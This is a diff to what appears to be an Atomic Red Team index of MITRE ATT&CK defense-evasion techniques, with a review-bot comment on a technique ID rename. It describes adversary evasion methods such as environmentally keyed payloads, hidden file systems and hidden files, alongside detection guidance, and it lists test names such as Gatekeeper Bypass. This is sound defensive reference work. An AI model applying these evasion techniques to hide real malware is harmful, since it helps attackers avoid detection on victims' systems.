+ - source_name: Proofpoint Router Malvertising
+ url: https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices
+ description: Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising
+ on Windows, Android Devices. Retrieved January 16, 2019.
+ - source_name: EK Impeding Malware Analysis
+ url: https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf
+ description: Song, C., et al. (2012, August 7). Impeding Automated Malware
+ Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.
+ - source_name: Environmental Keyed HTA
+ url: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/
+ description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
+ Explorer/Edge. Retrieved January 16, 2019.
+ - source_name: 'Ebowla: Genetic Malware'
+ url: https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf
+ description: 'Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing
+ Payloads for Specific Targets. Retrieved January 18, 2019.'
+ - source_name: Demiguise Guardrail Router Logo
+ url: https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js
+ description: 'Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved
+ January 17, 2019.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Environmental Keying
+ description: |-
+ Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)
+
+ Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
+
+ Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
+
+ Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
+ id: attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-24T18:52:12.719Z'
+ created: '2020-06-23T22:28:28.041Z'
+ x_mitre_contributors:
+ - Nick Carr, FireEye
+ x_mitre_detection: Detecting the use of environmental keying may be difficult
+ depending on the implementation. Monitoring for suspicious processes being
+ spawned that gather a variety of system information or perform other forms
+ of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short
+ period of time, may aid in detection.
+ x_mitre_data_sources:
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
+ - Static file analysis
x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1574.005:
technique:
@@ -23295,139 +24039,80 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-26T19:20:23.030Z'
created: '2020-03-13T11:12:18.558Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- x_mitre_detection: |-
- Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
-
- Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_effective_permissions:
- Administrator
- User
- SYSTEM
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
+
+ Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1480:
technique:
external_references:
- - external_id: T1480
- source_name: mitre-attack
+ - source_name: mitre-attack
+ external_id: T1480
url: https://attack.mitre.org/techniques/T1480
- source_name: FireEye Kevin Mandia Guardrails
url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- - source_name: EK Clueless Agents
- url: https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf
- description: Riordan, J., Schneier, B. (1998, June 18). Environmental Key
- Generation towards Clueless Agents. Retrieved January 18, 2019.
- - source_name: Kaspersky Gauss Whitepaper
- url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf
- description: 'Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution.
- Retrieved January 17, 2019.'
- - source_name: Proofpoint Router Malvertising
- url: https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices
- description: Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising
- on Windows, Android Devices. Retrieved January 16, 2019.
- - source_name: EK Impeding Malware Analysis
- url: https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf
- description: Song, C., et al. (2012, August 7). Impeding Automated Malware
- Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.
- - source_name: Environmental Keyed HTA
- url: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/
- description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved January 16, 2019.
- - source_name: 'Ebowla: Genetic Malware'
- url: https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf
- description: 'Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing
- Payloads for Specific Targets. Retrieved January 18, 2019.'
- - source_name: Demiguise Guardrail Router Logo
- url: https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js
- description: 'Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved
- January 17, 2019.'
+ - source_name: FireEye Outlook Dec 2019
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
+ the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
+ June 23, 2020.'
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Execution Guardrails
- description: "Execution guardrails constrain execution or actions based on adversary
- supplied environment specific conditions that are expected to be present on
- the target. \n\nGuardrails ensure that a payload only executes against an
- intended target and reduces collateral damage from an adversary’s campaign.(Citation:
- FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target
- system or environment to use as guardrails may include specific network share
- names, attached physical devices, files, joined Active Directory (AD) domains,
- and local/external IP addresses.\n\nEnvironmental keying is one type of guardrail
- that includes cryptographic techniques for deriving encryption/decryption
- keys from specific types of values in a given computing environment.(Citation:
- EK Clueless Agents) Values can be derived from target-specific elements and
- used to generate a decryption key for an encrypted payload. Target-specific
- values can be derived from specific network shares, physical devices, software/software
- versions, files, joined AD domains, system time, and local/external IP addresses.(Citation:
- Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation:
- EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation:
- Ebowla: Genetic Malware) By generating the decryption keys from target-specific
- environmental values, environmental keying can make sandbox detection, anti-virus
- detection, crowdsourcing of information, and reverse engineering difficult.(Citation:
- Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties
- can slow down the incident response process and help adversaries hide their
- tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files
- or Information](https://attack.mitre.org/techniques/T1027), adversaries may
- use guardrails and environmental keying to help protect their TTPs and evade
- detection. For example, environmental keying may be used to deliver an encrypted
- payload to the target that will use target-specific values to decrypt the
- payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation:
- EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation:
- Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing
- target-specific values to decrypt the payload the adversary can avoid packaging
- the decryption key with the payload or sending it over a potentially monitored
- network connection. Depending on the technique for gathering target-specific
- values, reverse engineering of the encrypted payload can be exceptionally
- difficult.(Citation: Kaspersky Gauss Whitepaper) In general, guardrails can
- be used to prevent exposure of capabilities in environments that are not intended
- to be compromised or operated within. This use of guardrails is distinct from
- typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
- where a decision can be made not to further engage because the value conditions
- specified by the adversary are meant to be target specific and not such that
- they could occur in any environment."
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2019-07-19T14:59:44.034Z'
+ modified: '2020-06-24T18:52:12.956Z'
created: '2019-01-31T02:10:08.261Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_contributors:
- - Nick Carr, FireEye
- x_mitre_data_sources:
- - Process monitoring
- x_mitre_detection: Detecting the action of environmental keying may be difficult
- depending on the implementation. Monitoring for suspicious processes being
- spawned that gather a variety of system information or perform other forms
- of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short
- period of time, may aid in detection.
- x_mitre_permissions_required:
- - User
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
x_mitre_defense_bypassed:
- Anti-virus
- Host forensic analysis
- Signature-based detection
- - Static File Analysis
- x_mitre_version: '1.0'
+ - Static file analysis
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_data_sources:
+ - Process monitoring
+ x_mitre_contributors:
+ - Nick Carr, FireEye
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1211:
technique:
@@ -23450,16 +24135,13 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T20:00:46.900Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - John Lambert, Microsoft Threat Intelligence Center
- x_mitre_data_sources:
- - Windows Error Reporting
- - Process monitoring
- - File monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - System access controls
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Exploitation for defense evasion may happen shortly after
the system has been compromised to prevent detection during later actions
for for additional tools that may be brought in and used. Detecting software
@@ -23469,13 +24151,16 @@ defense-evasion:
compromise, such as abnormal behavior of processes. This could include suspicious
files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution or evidence of Discovery.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - System access controls
+ x_mitre_data_sources:
+ - Windows Error Reporting
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_version: '1.1'
atomic_tests: []
T1055.011:
technique:
@@ -23554,31 +24239,31 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:38:26.296Z'
+ modified: '2020-06-20T22:26:33.191Z'
created: '2020-01-14T17:18:32.126Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
x_mitre_detection: 'Monitor for API calls related to enumerating and manipulating
EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and
SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated
with this technique have also used SendNotifyMessage (Citation: Microsoft
SendNotifyMessage function) to trigger the associated window procedure and
eventual malicious injection. (Citation: Endgame Process Injection July 2017)'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
- T1551.004:
+ T1070.004:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1551.004
- url: https://attack.mitre.org/techniques/T1551/004
+ external_id: T1070.004
+ url: https://attack.mitre.org/techniques/T1070/004
- url: http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/
description: 'Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools
of the Trade. Retrieved December 2, 2015.'
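Review bot: The technique key `T1551.004` is renamed to `T1070.004` together with its `external_id` and `url`, and the `identifier:` field follows in a later hunk, so every lookup keyed on the old ID changes in this sync. The atomic tests beneath it keep their `auto_generated_guid`, which preserves test identity, but I cannot tell from this diff whether other files or tooling in the repository still reference `T1551.004`; a repository-wide search for the old ID before merging would confirm nothing dangles. The renamed technique's entry runs past the end of this hunk.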
@@ -23598,14 +24283,14 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:34:16.209Z'
created: '2020-01-31T12:35:36.479Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Binary file metadata
- - Process command-line parameters
- - File monitoring
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
@@ -23616,15 +24301,15 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- x_mitre_defense_bypassed:
- - Host forensic analysis
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Walker Johnson
- identifier: T1551.004
+ x_mitre_data_sources:
+ - Binary file metadata
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ identifier: T1070.004
atomic_tests:
- name: Delete a single file - Linux/macOS
auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480
@@ -23837,8 +24522,19 @@ defense-evasion:
name: powershell
T1222:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2018-10-17T00:14:20.652Z'
+ modified: '2020-03-29T23:12:40.212Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: File and Directory Permissions Modification
+ description: |-
+ Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
+
+ Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
external_references:
- source_name: mitre-attack
external_id: T1222
@@ -23855,19 +24551,8 @@ defense-evasion:
description: Netsurion. (2014, February 19). Monitoring File Permission Changes
with the Windows Security Log. Retrieved August 19, 2018.
source_name: EventTracker File Permissions Feb 2014
- description: |-
- Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
-
- Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
- name: File and Directory Permissions Modification
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T23:12:40.212Z'
- created: '2018-10-17T00:14:20.652Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_is_subtechnique: false
x_mitre_permissions_required:
- User
@@ -23948,16 +24633,13 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-02-05T16:16:08.471Z'
+ modified: '2020-06-20T22:41:20.063Z'
created: '2020-02-05T16:16:08.471Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Anti-virus
- x_mitre_permissions_required:
- - User
- - Administrator
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
x_mitre_detection: Monitoring for the removal of the com.apple.quarantine
flag by a user instead of the operating system is a suspicious action and
should be examined further. Monitor and investigate attempts to modify extended
@@ -23965,11 +24647,14 @@ defense-evasion:
utilities may generate high false positive alerts, so compare against baseline
knowledge for how systems are typically used and correlate modification events
with other indications of malicious activity where possible.
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- x_mitre_platforms:
- - macOS
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1553.001
atomic_tests:
- name: Gatekeeper Bypass
@@ -24067,17 +24752,10 @@ defense-evasion:
phase_name: privilege-escalation
modified: '2020-03-26T21:17:41.231Z'
created: '2019-03-07T14:10:32.650Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
- x_mitre_data_sources:
- - Windows event logs
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - System access controls
+ - File system access controls
x_mitre_detection: "It is possible to detect GPO modifications by monitoring
directory service changes using Windows event logs. Several events may be
logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory
@@ -24090,10 +24768,17 @@ defense-evasion:
value modifications, like those to SeEnableDelegationPrivilege, can also be
searched for in events associated with privileges assigned to new logons (Event
ID 4672) and assignment of user rights (Event ID 4704). "
- x_mitre_defense_bypassed:
- - System access controls
- - File system access controls
- x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_data_sources:
+ - Windows event logs
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1562.003:
technique:
@@ -24121,25 +24806,25 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:09:18.020Z'
created: '2020-02-21T20:56:06.498Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Log analysis
+ x_mitre_detection: Correlating a user session with a distinct lack of new commands
+ in their .bash_history can be a clue to suspicious behavior.
+ Additionally, users checking or changing their HISTCONTROL environment
+ variable is also suspicious.
x_mitre_data_sources:
- Environment variable
- File monitoring
- Authentication logs
- Process monitoring
- x_mitre_detection: Correlating a user session with a distinct lack of new commands
- in their .bash_history can be a clue to suspicious behavior.
- Additionally, users checking or changing their HISTCONTROL environment
- variable is also suspicious.
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Log analysis
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1562.003
atomic_tests:
- name: Disable history collection
@@ -24173,8 +24858,86 @@ defense-evasion:
3. ls
4. whoami > recon.txt
name: manual
+ T1564.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1564.005
+ url: https://attack.mitre.org/techniques/T1564/005
+ - source_name: MalwareTech VFS Nov 2014
+ url: https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html
+ description: Hutchins, M. (2014, November 28). Virtual File Systems for Beginners.
+ Retrieved June 22, 2020.
+ - url: https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html
+ description: 'Andonov, D., et al. (2015, December 7). Thriving Beyond The
+ Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved
+ May 13, 2016.'
+ source_name: FireEye Bootkits
+ - source_name: ESET ComRAT May 2020
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
+ description: 'Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year
+ journey. Retrieved June 15, 2020.'
+ - source_name: Kaspersky Equation QA
+ description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
+ Equation Group: Questions and Answers. Retrieved December 21, 2015.'
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Hidden File System
+ description: |-
+ Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
+
+ Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)
+ id: attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-29T15:12:11.024Z'
+ created: '2020-06-28T22:55:55.719Z'
+ x_mitre_data_sources:
+ - File monitoring
+ - Windows Registry
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: Detecting the use of a hidden file system may be exceptionally
+ difficult depending on the implementation. Emphasis may be placed on detecting
+ related aspects of the adversary lifecycle, such as how malware interacts
+ with the hidden file system or how a hidden file system is loaded. Consider
+ looking for anomalous interactions with the Registry or with a particular
+ file on disk. Likewise, if the hidden file system is loaded on boot from reserved
+ disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003)
+ activity.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ atomic_tests: []
T1564.001:
technique:
+ created: '2020-02-26T17:46:13.128Z'
+ modified: '2020-03-29T22:32:25.985Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d
+ description: |-
+ Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).
+
+ On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
+
+ Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
+
+ Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.
+ name: Hidden Files and Directories
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1564.001
